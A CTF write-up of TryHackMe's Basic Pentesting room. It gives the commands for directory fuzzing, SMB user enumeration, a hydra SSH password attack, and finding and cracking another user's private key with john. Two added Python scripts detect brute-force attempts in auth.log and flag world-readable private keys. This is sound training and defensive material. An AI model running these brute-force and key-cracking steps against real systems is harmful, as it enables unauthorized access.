[EN] TryHackMe Basic Pentesting Writeup
Hello everyone. Today I will show you the solution to the Basic Pentesting CTF.
Let’s Start.
Task 1: Web App Testing and Privilege Escalation
1. Deploy the machine and connect to our network
No answer needed
2. Find the services exposed by the machine
3. What is the name of the hidden directory on the web server?
We will now do a directory search:
ffuf -u http://MACHINE_IP/FUZZ -w /wordlist_path
gobuster dir -w /wordlist_path -u http://MACHINE_IP/
Yay, we found the hidden directory, and we go there.
4. User brute-forcing to find the username & password
No answer needed
5. What is the username?
We check the pages. There were conversations about SMB, and we saw that the SMB port is open in the Nmap output.
I think we will use "enum4linux":
enum4linux -a <MACHINE_IP>
We found usernames!!!
6. What is the password?
We only know the username, and we think SSH, so we will use "hydra":
hydra -l jan -P /wordlist_path <MACHINE_IP> ssh
Yes, we found the password. Let's go inside.
We are in !!!
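From the defender's side, a wordlist attack like the hydra step above leaves a very recognisable trail in /var/log/auth.log: a burst of "Failed password" lines from one source, followed by an "Accepted" line from the same source. The script below is an added example (not part of the original writeup) that reads such lines and flags the source and the login that succeeded after failures. The log lines are constructed samples in OpenSSH's standard format; the host name, IP addresses, timestamps and the failure threshold are assumptions.

```python
"""Detect SSH password brute-force activity in auth.log lines.

Added example, not from the original writeup. The log excerpt is a
constructed sample in OpenSSH's auth.log format; hosts, IPs and the
threshold are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: what auth.log on the target looks like while a
# wordlist attack against the "jan" account runs and finally succeeds,
# followed by a key-based login as "kay" from the same source.
SAMPLE_AUTH_LOG = """\
Apr 10 10:00:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 50211 ssh2
Apr 10 10:00:01 target sshd[1203]: Failed password for jan from 10.10.14.5 port 50212 ssh2
Apr 10 10:00:02 target sshd[1205]: Failed password for invalid user admin from 10.10.14.5 port 50213 ssh2
Apr 10 10:00:02 target sshd[1207]: Failed password for jan from 10.10.14.5 port 50214 ssh2
Apr 10 10:00:03 target sshd[1209]: Failed password for jan from 10.10.14.5 port 50215 ssh2
Apr 10 10:00:03 target sshd[1211]: Accepted password for jan from 10.10.14.5 port 50216 ssh2
Apr 10 10:05:00 target sshd[1300]: Accepted publickey for kay from 10.10.14.5 port 50300 ssh2: RSA SHA256:PLACEHOLDER
Apr 10 10:07:12 target sshd[1350]: Failed password for kay from 192.168.1.20 port 40001 ssh2
"""

# "invalid user" appears when the account does not exist; the optional
# group keeps the regex working for both shapes of the message.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port"
)
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+) port")


def analyze_auth_log(text, threshold=3):
    """Return (brute_force_sources, logins_after_failures).

    brute_force_sources: {ip: failure_count} for every IP with at least
    `threshold` failed password attempts.
    logins_after_failures: [(user, ip, auth_method)] for every accepted
    login from an IP that had already failed at least once; a successful
    guess, and any follow-on key login, shows up here.
    """
    failures = defaultdict(int)
    logins_after_failures = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            method, user, ip = m.groups()
            if failures.get(ip, 0) > 0:
                logins_after_failures.append((user, ip, method))
    brute_force_sources = {ip: n for ip, n in failures.items() if n >= threshold}
    return brute_force_sources, logins_after_failures


if __name__ == "__main__":
    sources, logins = analyze_auth_log(SAMPLE_AUTH_LOG)
    for ip, count in sources.items():
        print(f"[!] {count} failed password attempts from {ip}")
    for user, ip, method in logins:
        print(f"[!] '{user}' logged in via {method} from {ip} after earlier failures")
```

Run it against a real file with `analyze_auth_log(open("/var/log/auth.log").read())`; on a host where hydra has been at work the first dictionary will hold the attacking IP, and the second list shows which account the guess landed on. A threshold of 3 within a single file is deliberately low for the sample; in practice you would bucket by time window.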
7. What service do you use to access the server?
SSH
8. Enumerate the machine to find any vectors for privilege escalation
No answer needed
9. What is the name of the other user you found?
There are many ways to solve this. You can go to the "/home/" directory and see it, or you can read "/etc/passwd" and see it (the proper method, in my opinion).
10. If you have found another user, what can you do with this information?
No answer needed
We can check crontabs or look for an SSH key:
find / -name "*id_rsa*" 2>/dev/null
We take "id_rsa" and crack it with john. But first we must convert it into a hash that john understands:
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/wordlist_path id_rsa.hash
Yay, we found it!!!
ssh -i id_rsa kay@localhost (run this from inside jan's SSH session)
Hokus Pokus !!!
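The whole key step above only works because jan could read a private key belonging to kay. On a real host the fix is mundane (private keys are mode 0600 and owned by their user, which is also what ssh itself insists on before it will use a key), but the check for it is worth automating. The script below is an added example, not part of the original writeup: it builds a throwaway directory that imitates /home with placeholder key files (no real key material), then reports every private key whose mode lets group or others read it. The user names, paths and placeholder contents are constructed.

```python
"""Audit SSH private keys for permissions that expose them to other users.

Added example, not from the original writeup. It creates a temporary
/home lookalike with constructed placeholder keys, one protected (0600)
and one world-readable (0644), and reports the exposed one.
"""
import os
import shutil
import stat
import tempfile

# A private key file in either PEM or OpenSSH format starts with
# "-----BEGIN ... PRIVATE KEY-----"; public keys and other files do not.
PRIVATE_KEY_MARKER = b"PRIVATE KEY-----"


def is_private_key(path):
    """True if the file begins with a private-key header."""
    try:
        with open(path, "rb") as f:
            head = f.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN") and PRIVATE_KEY_MARKER in head


def find_exposed_keys(root):
    """Walk `root` and return sorted (relative_path, octal_mode) tuples for
    private keys readable by group or others (any of the 0o044 bits set)."""
    exposed = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not is_private_key(path):
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                exposed.append((os.path.relpath(path, root), oct(mode)))
    return sorted(exposed)


def build_sample_tree():
    """Create a constructed home-directory tree: jan's key is protected,
    kay's key is world-readable. Returns the root path; caller removes it."""
    root = tempfile.mkdtemp(prefix="keyaudit_")
    placeholder = (
        b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
        b"PLACEHOLDER-NOT-A-REAL-KEY\n"
        b"-----END OPENSSH PRIVATE KEY-----\n"
    )
    for user, mode in (("jan", 0o600), ("kay", 0o644)):
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key_path = os.path.join(ssh_dir, "id_rsa")
        with open(key_path, "wb") as f:
            f.write(placeholder)
        os.chmod(key_path, mode)
        # The matching .pub file is meant to be readable and must not be flagged.
        with open(key_path + ".pub", "w") as f:
            f.write(f"ssh-rsa PLACEHOLDER {user}@target\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for rel_path, mode in find_exposed_keys(root):
            print(f"[!] {rel_path} is mode {mode}; private keys should be 0600")
    finally:
        shutil.rmtree(root)
```

Pointed at a real system (`find_exposed_keys("/home")`, run as root so every directory is readable) the same function lists the keys that a low-privileged account could copy off the box exactly as jan did with kay's; note that it judges only the file mode, so a key sitting in a directory that is itself traversable by everyone is reported, while a 0600 key with the wrong owner is not and still needs a separate ownership check.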
11. What is the final password you obtain?
YAY CONGRATS !!!
This CTF was so much fun. See you in the next CTF.